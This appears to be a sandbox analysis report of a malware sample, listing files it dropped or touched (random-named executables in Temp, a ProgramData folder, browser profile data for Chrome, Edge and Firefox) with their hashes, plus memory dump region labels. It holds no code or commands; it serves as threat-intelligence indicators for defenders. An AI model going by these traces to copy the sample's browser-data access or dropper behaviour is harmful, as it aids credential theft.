C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\_ctypes.pyd

MD5 5377ab365c86bbcdd998580a79be28b4
SHA1 b0a6342df76c4da5b1e28a036025e274be322b35
SHA256 6c5f31bef3fdbff31beac0b1a477be880dda61346d859cf34ca93b9291594d93
SHA512 56f28d431093b9f08606d09b84a392de7ba390e66b7def469b84a21bfc648b2de3839b2eee4fb846bbf8bb6ba505f9d720ccb6bb1a723e78e8e8b59ab940ac26

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\onefile_1556_133856873535695718\win32api.pyd

MD5 e9d8ab0e7867f5e0d40bd474a5ca288c
SHA1 e7bdf1664099c069ceea18c2922a8db049b4399a
SHA256 df724f6abd66a0549415abaa3fdf490680e6e0ce07584e964b8bfd01e187b487
SHA512 49b17e11d02ae99583f835b8ecf526cf1cf9ceab5d8fac0fbfaf45411ac43f0594f93780ae7f6cb3ebbc169a91e81dd57a37c48a8cd5e2653962ffbdcf9879bb

memory/4036-274-0x000001C9EB3A0000-0x000001C9EB3C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tzagq5gn.lph.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4972-286-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/4120-299-0x0000000000E20000-0x00000000012C1000-memory.dmp

memory/1556-333-0x00007FF717560000-0x00007FF718101000-memory.dmp

memory/4328-340-0x00007FF7EF760000-0x00007FF7F0DAB000-memory.dmp

memory/2668-341-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4120-342-0x0000000000E20000-0x00000000012C1000-memory.dmp

memory/2668-343-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-348-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-349-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-352-0x0000000000400000-0x0000000000429000-memory.dmp

C:\ProgramData\a1vsr\8q9rieukn

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

memory/2668-356-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4972-357-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/2668-365-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4552-374-0x0000000000ED0000-0x00000000015BE000-memory.dmp

memory/2668-378-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-379-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-385-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\scoped_dir5104_142832076\b9cee862-a499-4ed8-9bd8-6226bdc5712d.tmp

MD5 eae462c55eba847a1a8b58e58976b253
SHA1 4d7c9d59d6ae64eb852bd60b48c161125c820673
SHA256 ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad
SHA512 494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

C:\Users\Admin\AppData\Local\Temp\scoped_dir5104_142832076\CRX_INSTALL\_locales\en_CA\messages.json

MD5 558659936250e03cc14b60ebf648aa09
SHA1 32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825
SHA256 2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b
SHA512 1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

MD5 07ffbe5f24ca348723ff8c6c488abfb8
SHA1 6dc2851e39b2ee38f88cf5c35a90171dbea5b690
SHA256 6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c
SHA512 7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

MD5 4ec1df2da46182103d2ffc3b92d20ca5
SHA1 fb9d1ba3710cf31a87165317c6edc110e98994ce
SHA256 6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6
SHA512 939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 528c19dd04f37158aa1423f4aabf34db
SHA1 b6720db0b8aa91e9efff45e89443836864d3253e
SHA256 ef1b268029d02fa23ed517b3cdeaa9a5eef774d3c034e0c50f5e5df6495dc248
SHA512 3cfaa7a90160eb2157f4fe88dbb9a0fdb942267b51ee2b090d774e522a256d39d502cb9677e9597c604c9a9d4c35378d3208c4572f410d184b460cd2c212526e

memory/2668-809-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4972-810-0x0000000000360000-0x000000000080B000-memory.dmp

memory/2668-811-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-812-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-813-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 1bed6483de34dd709e03fd3af839a76b
SHA1 3724a38c9e51fcce7955a59955d16bf68c083b92
SHA256 37a42554c291f46995b2487d08d80d94cefe6c7fb3cb4ae9c7c5e515d6b5e596
SHA512 264f6687ea8a8726b0000de1511b7b764b3d5a6f64946bb83a58effda42839e593de43865dafeeb89f5b78cc00d16f3979b417357fa2799ca0533bdf72f07fda

memory/4552-820-0x0000000000ED0000-0x00000000015BE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a9e52146-99e6-4c0e-ad53-f6613a41c995.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 fe6fb7ffeb0894d21284b11538e93bb4
SHA1 80c71bf18f3798129931b1781115bbef677f58f0
SHA256 e36c911b7dbea599da8ed437b46e86270ce5e0ac34af28ac343e22ecff991189
SHA512 3a8bd7b31352edd02202a7a8225973c10e3d10f924712bb3fffab3d8eea2d3d132f137518b5b5ad7ea1c03af20a7ab3ff96bd99ec460a16839330a5d2797753b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fb62838bcb79d3351d56db0d8a755a13
SHA1 df67f13d2c54351d7d0882981b24c542455339ab
SHA256 7266ee7b59366d7719432a9fc1e09d5053ba8c438562bed25addd1eb264d01ad
SHA512 94a6a45819c7cec809a5b2f550f3b187e004cc5057500fe02d345c68686bd66f0ac9f4e8e23d66df4e3022d6a666e0f7d189f7ab050fcff0126ba9be7885a03b

memory/2668-844-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-846-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-849-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-853-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-854-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-858-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-859-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe

MD5 35a4dfb5f0308d20b1e5bf26e0a70509
SHA1 0c72b35b74dadbce4a95c034968913de271aae06
SHA256 40d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339
SHA512 51b8bf5583a256015daaa8caa9c9868c792ef4a1157b89a6880b365c4c5a1c7416abc2b1fcdde9d1d5d9bb7aaa1c617d5b34124a582ec042ac5a2afa064c60d9

memory/2668-877-0x0000000000400000-0x0000000000429000-memory.dmp

memory/5040-879-0x0000000000010000-0x0000000000F24000-memory.dmp

memory/2668-880-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4972-881-0x0000000000360000-0x000000000080B000-memory.dmp

memory/2668-884-0x0000000000400000-0x0000000000429000-memory.dmp

memory/5040-885-0x000000001BB50000-0x000000001C6B6000-memory.dmp

memory/2668-887-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-888-0x0000000000400000-0x0000000000429000-memory.dmp

memory/4036-892-0x000001BF7B600000-0x000001BF7BBB6000-memory.dmp

memory/4036-896-0x000001BF7BFF0000-0x000001BF7BFFA000-memory.dmp

memory/4036-897-0x000001BF7E0D0000-0x000001BF7E146000-memory.dmp

memory/2668-898-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-899-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-901-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

C:\ProgramData\a1vsr\fctr1d

MD5 cb2d9667b30daf2bf332fd7c5966fa60
SHA1 10a35ead39eb5740a3714ac8f8903b07b191707e
SHA256 ce7e6652915e2f30c792af884ef3452964c945090a12f8e3f28291caafc7070b
SHA512 3051b56ca1ca6127adec2f7d0ea987d2fed000a2c24f819a0725f1d7c230e1bab1796973e880e2e6a159d00b3b0066f1fb7910798927463ec4fcde3b7d65d462

C:\ProgramData\a1vsr\f3ekn7

MD5 40f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1 d6582ba879235049134fa9a351ca8f0f785d8835
SHA256 cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512 cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

memory/5492-940-0x0000000000360000-0x000000000080B000-memory.dmp

memory/5492-942-0x0000000000360000-0x000000000080B000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/5704-955-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107370101\c29c440560.exe

MD5 7c169698effcdd45b7cbd763d28e87f5
SHA1 4f9db666d66255cd7ca2b0973ff00eae8b155f7a
SHA256 c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b
SHA512 58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3

memory/5488-973-0x0000000000D00000-0x0000000001013000-memory.dmp

memory/5704-974-0x0000000000400000-0x0000000000840000-memory.dmp

memory/5488-981-0x0000000000D00000-0x0000000001013000-memory.dmp

memory/5636-982-0x00000000008A0000-0x0000000000D5D000-memory.dmp

memory/5636-984-0x00000000008A0000-0x0000000000D5D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107380101\9bd1404279.exe

MD5 2012699a5e85cd283323c324aa061bc7
SHA1 69d93116908bf4b6c61a9cb2d3f50a5fbb8cec0f
SHA256 937ff3f78062e3aaad013b88bb6e807770d40bb65e538eee9c5de6b1487510b5
SHA512 729e7f19b8dc678a8f8912a9ab64169391259fe9d129ba99ef91360f82f81b2c2e628d68a4d5d9c2e4e3fe9e5c09ff295e6021bb3d23a107d6ab59a361d66683

memory/5988-998-0x0000000000530000-0x0000000000BC7000-memory.dmp

memory/5988-1000-0x0000000000530000-0x0000000000BC7000-memory.dmp

C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe

MD5 ffb5c5f8bab4598fada3bbf92d02d66d
SHA1 ae8096c1f160c97874179ea878a61f69bfb9941a
SHA256 f3aa764be17f1a197f94b949cfd88f99c2d67e9fec1f53046ef1b6189f594da1
SHA512 902e8a95b964ef3a48504dcdb3c4f0615212eb942476ec26b88e02a39cbaaf866f3fcbe5cd4374342b80aae9a7e17092a28dbe1d53630493a0b0cee8152a4ccf

C:\Users\Admin\AppData\Local\Temp\10107390101\4b886460ab.exe

MD5 e935a122d4c4e9c1b44368821a5154ff
SHA1 c93e4b9fb9563cb04a9cd39c75220eaf6007f98f
SHA256 161b8b9257159ff8789d47b9a4f5c4b7c6a6e66470392898a8c301348d28cbb4
SHA512 75a94d4c73fb917adaae4cc2c8e3a74bc4520cd45b87af146b53aca42b194cd26126ad4a2db5efad2aaa41e2874f8b71d58ebab8752c73039e233c8cd94a7e7f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\564777e0-8866-4916-bc1b-5a8844dcd090

MD5 860f8d9628b970e6d7438d4c293868d9
SHA1 bbbd7893b89f9c8d31b0fb3b3fbbcef52c2abd97
SHA256 6c6e118ec42c542f00cfa8a3c5734ff91d2f593493a72b2164c7c9c3de6572de
SHA512 bc85a91605caaf79cadd87d6320fcda6514aceb8fb038aa0393a4d3fd4dd07973b967cb3780191f3dde2a632f43914d27b13c0d9c09b6d073aa197076d46c48b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\8c3d6871-4104-4bc1-8dea-f3de51adf36b

MD5 6ba26cd5ca6965b556f8b74797ef24fa
SHA1 0db4c5ac46d5993f4deec507b7357fe0afbf22ae
SHA256 50dd80388dd368d458cabf2cea29d93ac6aec55f0055be3ff2759a11947c5d40
SHA512 e0b05862adb9e7ce06f8815dc0971d30a887a7d56405ce6bc2e49d4d0df2a72722acaac96dd887eb8f2b886a2fcd51cdd3b92c0435abd9a0a35a2ae097a0c650

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\pending_pings\d256b6b1-10e5-4c09-a31b-27a1a7c745b9

MD5 d566122edbe2cf117f004e7690b9478b
SHA1 cedaeaae4c2c2bc9af77eb83a885d62525f2fe2c
SHA256 799ce04dd184179e6ed8e31fed2861c4ad4f5315c7f08ef40f15b112f3c59c7e
SHA512 ab47489716b03acc4cb6348f99250fe97ae9c24cc641dff640ace0c5187685823010c886386644bdbd08029339a08afb2d3088e7d24bcd4d0d66142f7a0a6b71

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp

MD5 5d30e9686990fb3211eb78843b1622f7
SHA1 f03dd2aa9f4f5a1c9144e777b0854ca3a009660d
SHA256 dcf066016635a8ec2fb98b3e4f41ea8292ee4229ff2422a6e5d6a5e00589c74f
SHA512 b7695364ffee2d7c8320618e54487cf919339ba85a6575db3854040f7984544e24e7cf52fe0e21dc45b4f39e4b826106ef9884b44bf338afa279c15e4a297bab

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin

MD5 557dff65cd526335bec2632c878841f4
SHA1 0378129632069854b60cb7d67347b272a715b84d
SHA256 34770a860f39bfa808c1067cecc4cb03d9f68b369517e57c6ce6abe97104a131
SHA512 ab5e8a3e9f6f9138d4c84118e3ad42ca6fed1ee2b9f921a8329523a6eb3cdb419ea515f14d1f5f108c95307f936170c373e89a8d029ff53a9dfdcb812a33af91

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp

MD5 9d3b009986091756fabb26cf50f66cea
SHA1 5ee025b31387ecbf85ca444e6aeefdf9db805837
SHA256 3cfa0e94d0ea5e4c5c8db775753b1c1dfc48c2ca587bb811cc6db667fe4b1a99
SHA512 0f37e0e3997b9039f91a591d803c089fb3ebad2a5a7bc7b304576fd65297adc503686a1c729ecc1d0af8d9c5a1d35688f728ab3ee7061b75d9ef48120f0a4878

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\activity-stream.discovery_stream.json

MD5 ab18c9c83414f858d99878bbe8d1cc5c
SHA1 ea004fa2c856fcfa8798aa395332879a199297b4
SHA256 0a8a6ffeb724a52098589b313e384d9cbbc18fd22ec6d84fc8f9a5ac53b4d9ac
SHA512 a303a9c43226b2b3e6f86de2fe31bc6a561f18478a782fe86df9d5d9b5a773d93f0052960f2e1d20091f467de1c8d2f00839f135a92c5cfe0be248d95620ed7f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\AlternateServices.bin

MD5 f6b801a414a8eec7b9e9b8f71472e650
SHA1 bd804d35e090da1e743bff3e7cfce56881fac9b5
SHA256 7407c0b24708bd820263fbb9f28d2632d21550cf29fdf271a6d430a603a627f8
SHA512 3f6e0319b9d42b82bfb809c5a78550990a64ce7116d7cdc4dc92368a1ee730b8e06d3c50b885c8cb060e7a9f4762ba91218a956a471c2aafa61325be25407c10

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs.js

MD5 b45abd74f42f374d4a31983748a6ddc0
SHA1 ed5d1ec3e25f9b387934b7e64bc401968b6d6494
SHA256 35efd5c260de1a5d6510b42ad1583457b9f4983df3fc94566742bf78b5986dd4
SHA512 bfb6e99ae1e911affb2fca2bf03184e1d1e7af4b5558ac8a93807e2552945671bfc5f6176f5ade47ef3a594a062187a29b5f90b1604ae5c795b9494b02177e81

C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe

MD5 e787e8998f5306a754d625d7e29bbeb5
SHA1 14e056dbf0b3991664910ee3a1d23a4bb2c0253d
SHA256 93339b4579800e861b8606cd011c6d919790c72691346eede1aa5d116514672d
SHA512 30463019ed1ba9aa0a46623f9068b842161c03f03bbd98da21584abf9c913beade0df4ae758c13f20dcd7937a26f1a6c7c5e6f785c75ce05ea500a7fe6d240f6

memory/3488-1362-0x0000000000E60000-0x00000000012D2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs-1.js

MD5 b89b59e530d8c8a4d9124be53eee914c
SHA1 f1917348880032e298f4951f11887e83b497247c
SHA256 7a0bf4e23ea9cdd91a73b426008d4498206bef48066cf22fc2904d7a4e6168e6
SHA512 e6fb78d37b44b4f0ac4bf2238b98950a068ce9a7292ae9eae2d9a96ad456b4dc3cd001efeb11ab65d27fcf748517dc0df1c3b59a0ae3890cd0c4cda87ea1b985

memory/3488-1368-0x0000000000E60000-0x00000000012D2000-memory.dmp

memory/3488-1369-0x0000000000E60000-0x00000000012D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107410101\263971d093.exe

MD5 745e4bcf3d176ea5e82a7c26a6733757
SHA1 499cf0a28c9469faabae1e0f998c6a9b3e82862f
SHA256 8af6936111d0ba881e34ec715d1383dc90c017cd5ca3f51f1d69dc02c0aa2c63
SHA512 bd3fe79f49b060ae01766ca3e424a466c5ca652863a00fd23109e177bc7f6b2856eb513ea18ebbf5c3bee8820f817c50fadda44e12fe79656fbe6bb811aba69d

memory/408-1412-0x0000000000890000-0x0000000000B99000-memory.dmp

memory/3488-1413-0x0000000000E60000-0x00000000012D2000-memory.dmp

memory/3488-1416-0x0000000000E60000-0x00000000012D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/736-1432-0x0000000000CF0000-0x0000000000D00000-memory.dmp

memory/408-1437-0x0000000000890000-0x0000000000B99000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\datareporting\glean\db\data.safe.tmp

MD5 dc23df6cb5e6ac1037bded282158f47e
SHA1 bdf55bc798b4eb6b83c800ed6b322b9d372bdc26
SHA256 f50d535cfbab2329ba8cf6ea5e1bc0f9ab962209c2f9d16891c19d8e67f6a639
SHA512 a85e69f578cff24e1050559eb1473ec1b9a2d65208842355590a919cdb2d1df1c18aae7feb0c1c8097012b77ceb8dac5a8828741f029ae3b8142f74177141731

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\prefs-1.js

MD5 08abcd3ab82ccf2f1e8ff45d3d04f6a8
SHA1 8a52850dd717edd2dc6ee774d55ba7e7ac4d6d21
SHA256 92905509365412b2cb4cac9f2c1337b89632110178e88a042ea99ec5d0783460
SHA512 790f3443b024ee782bc59e905fdb896dcdd0293fc3352efc9e02c90daddc6ed3bc86871919af95faa103d51913cb73a9397bfa9ec5fa606db4de4b615aec507d

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Temp\10107440101\c4c05d45b7.exe

MD5 8a632abe880092fb8fe1d3c882c417a5
SHA1 d3773cc8e6dc6dcd757a5cbc3269b435885fbbf4
SHA256 7f37d73657533b0e599dfac9fb0267c3e38342f1aeb475e3b72421440c95ece7
SHA512 3f9238f924e2cf022bd4d9c9c151b85055cd969561304de47baec945754e4e7b63e00a5ec7cfb2344d9c71c4a75e9a0d7f0c4fa16a0707cef87619240e63c196

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 f6bdd0d6e8b2933559ffbba6b877ec10
SHA1 151ae40fe11b8cecf510210bc6dc09f2e6f064e8
SHA256 efc5bc696e5d7e08e5f58659d4cae4fd660678389c9ab4f17de9ce174d597554
SHA512 2ddb4c48a337f4edecea6f78ead6a0116a9a0b4399f58d2f7347892f998c41fa295dff586bcd394fbaf569bc73ff96c8c037067b39f557a93a7433c3623870a1

memory/3144-1606-0x00000000027D0000-0x0000000002806000-memory.dmp

memory/3144-1607-0x0000000004FB0000-0x00000000055D8000-memory.dmp

memory/3144-1626-0x0000000005610000-0x0000000005632000-memory.dmp

memory/3144-1629-0x0000000005730000-0x0000000005796000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 c71d75af8d0f8889d4709a98ecf876f5
SHA1 f3cba58335cf14086a092387dd32722b606b2006
SHA256 8a0ca6866ec8eba35b72f86178f9ef958b2ad4a4471630324781ec72cf2babf3
SHA512 71f4c974b03a899deb84101e85bf5112db4e5c59f09addf854c90dd1e5ba2cab3d8014cd668900657e4ae6228459617cb412136e0b7a95fc76b7d1e8a565ca0c

memory/3144-1665-0x00000000057A0000-0x0000000005AF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 d2303d182670507a56ef52e72937dd2e
SHA1 2fe438e399d0dc621ce59a23114dca8875ae86b0
SHA256 ca71e0255cf8cce40e65a86f4e96fab5e8593e30a183b38739276f02ceab96a8
SHA512 72520c5edc8bf3e904faeaeaa245a082c231b97a5e443973763117b325bc9aa65aaff287b9fba54b912b5c8d95d940418c0e569fa7a0b89f9568bda380945316

memory/3144-1628-0x00000000056C0000-0x0000000005726000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\qdn1l7zn.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 7266db00c0486bc19357f7e9322e3605
SHA1 726fc4a7f529b7e3bf8b06e5288eff0813c5d23b
SHA256 b48a371936b11bec59a8848d78837e0f8da5a74746007f88b00819da84661010
SHA512 67534a7d83607dfe3b9ffa398b6c4551039860a27e9d35f2aacf28a4ea78f3c60c97d7f6ce9f44ff0ec37d57142000ca7d398a734d9395f2c47184b19473a78a

memory/3144-1709-0x0000000005DE0000-0x0000000005E2C000-memory.dmp

memory/3144-1702-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

